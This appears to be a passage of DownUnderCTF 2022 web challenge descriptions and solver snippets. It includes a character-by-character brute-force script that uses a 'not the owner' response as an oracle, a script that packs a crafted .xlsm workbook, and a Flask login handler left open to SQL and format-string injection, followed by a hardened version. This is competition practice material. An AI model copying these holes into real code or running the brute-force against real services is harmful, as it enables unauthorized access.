Well the world has been looking for this treasure for the last 25 years. Maybe you will have a better chance at finding it? Author: Crem#2193 https://web-treasure-hunt-e9a4730c2093.2022.ductf.dev
What's a beginner-friendly CTF without a totally not generic Bootstrap note taking web chall? Author: joseph#8210 https://web-noteworthy-873b7c844f49.2022.ductf.dev
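```python
import requests

# url, payload and cookie are not defined in this snippet; set them before running.
res = requests.get(url + payload, cookies=cookie)  # You are not the owner of this note!

# Extend the payload one character at a time, keeping a character whenever
# the response still contains the "not the owner" message.
for j in range(0, 50):
    for i in 'abdcefghijklmnopqrstuvwxyz012345678ABCDEFGHIJKLMNOPQRSTUVWXYZ_':
        res = requests.get(url + payload + i, cookies=cookie)
        if "You are not the owner of this note!" in res.text:
            payload += i
            print(payload)
            break
```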
Uni of Straya
The University of Straya are about to release their new Assignment Submission System (ASS) in two days, but have some concerns about the security of the platform. These concerns stemmed by the lead web developer admitting to inhaling burnt Hungry Jacks toys while developing the Flask REST API.
To assure the security of the platform follows best standards, you have the following goals to achieve:
1. Bypass authorization and view the admin console located at /admin.
2. Bypass access controls that prevent students from viewing other assignment submissions or the source code for the API. To demonstrate you have achieved this goal, there is a file called flag.txt in the API source code folder.
3. Exploit any critical vulnerabilities, such as RCE. If you can achieve RCE, run the command getfinalflag to get the flag.
Testing out the openpyxl library for python but there's some functionality I wish it had. Author: JZT https://web-dyslexxec-773a3cb4c483.2022.ductf.dev dyslexxec.tar.gz
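```python
# Compress the files
import os
import zipfile


def zip_file(src_dir):
    """Zip the contents of src_dir into src_dir + '.zip', with paths relative to src_dir."""
    zip_name = src_dir + '.zip'
    z = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)
    for dirpath, dirnames, filenames in os.walk(src_dir):
        # Archive path of this directory relative to src_dir
        fpath = dirpath.replace(src_dir, '')
        fpath = fpath and fpath + os.sep or ''
        for filename in filenames:
            z.write(os.path.join(dirpath, filename), fpath + filename)
    print('==压缩成功==')  # "compression succeeded"
    z.close()


if __name__ == '__main__':
    # Repack the unpacked workbook directory 'exp' as exp.xlsm
    zip_file('exp')
    os.remove('exp.xlsm')
    os.rename('exp.zip', './exp.xlsm')
```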
no-symlink
I heard symlinks are really dangerous so I delete them all and keep my secrets safe. Author: hashkitten https://web-no-symlink-821c2e0dbc5e.2022.ductf.dev
```python
from flask import Flask, request
import textwrap
import sqlite3
import os
import hashlib

assert len(os.environ['FLAG']) > 32

app = Flask(__name__)


@app.route('/', methods=['POST'])
def root_post():
    post = request.form

    # Sent params?
    if 'username' not in post or 'password' not in post:
        return 'Username or password missing from request'

    # We are recreating this every request
    con = sqlite3.connect(':memory:')
    cur = con.cursor()
    cur.execute('CREATE TABLE users (username TEXT, password TEXT)')
    cur.execute(
        'INSERT INTO users VALUES ("admin", ?)',
        [hashlib.md5(os.environ['FLAG'].encode()).hexdigest()]
    )
    output = cur.execute(
        'SELECT * FROM users WHERE username = {post[username]!r} AND password = {post[password]!r}'
        .format(post=post)
    ).fetchone()

    # Credentials OK?
    if output is None:
        return 'Wrong credentials'

    # Nothing suspicious?
    username, password = output
    if username != post["username"] or password != post["password"]:
        return 'Wrong credentials (are we being hacked?)'

    # Everything is all good
    return f'Welcome back {post["username"]}! The flag is in FLAG.'.format(post=post)
```
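A hardened counterpart to the login handler above, added here as an example and not part of the original write-up or the challenge source. The handler builds its `SELECT` with `str.format` and `!r`, and passes a string that already contains the username through `.format(post=post)` a second time; this version binds the inputs as SQL parameters and only ever inserts the username as data. The function names `make_db`, `check_login` and `welcome` are assumptions, and the table layout mirrors the handler's.

```python
import hashlib
import hmac
import sqlite3


def make_db(flag: str) -> sqlite3.Connection:
    """Build the same in-memory users table the handler creates."""
    con = sqlite3.connect(':memory:')
    con.execute('CREATE TABLE users (username TEXT, password TEXT)')
    con.execute('INSERT INTO users VALUES (?, ?)',
                ('admin', hashlib.md5(flag.encode()).hexdigest()))
    return con


def check_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Look the user up with a bound parameter; input never becomes SQL text."""
    row = con.execute('SELECT password FROM users WHERE username = ?',
                      (username,)).fetchone()
    if row is None:
        return False
    # Compare stored and submitted values in constant time.
    return hmac.compare_digest(row[0].encode(), password.encode())


def welcome(username: str) -> str:
    """The username is a format argument, never the format template."""
    return 'Welcome back {}!'.format(username)


if __name__ == '__main__':
    con = make_db('x' * 40)  # constructed stand-in for the FLAG value
    stored = con.execute('SELECT password FROM users').fetchone()[0]
    print(check_login(con, 'admin', stored))
    print(check_login(con, "' OR 1=1 --", "' OR 1=1 --"))
    print(welcome('{post.__class__}'))
```
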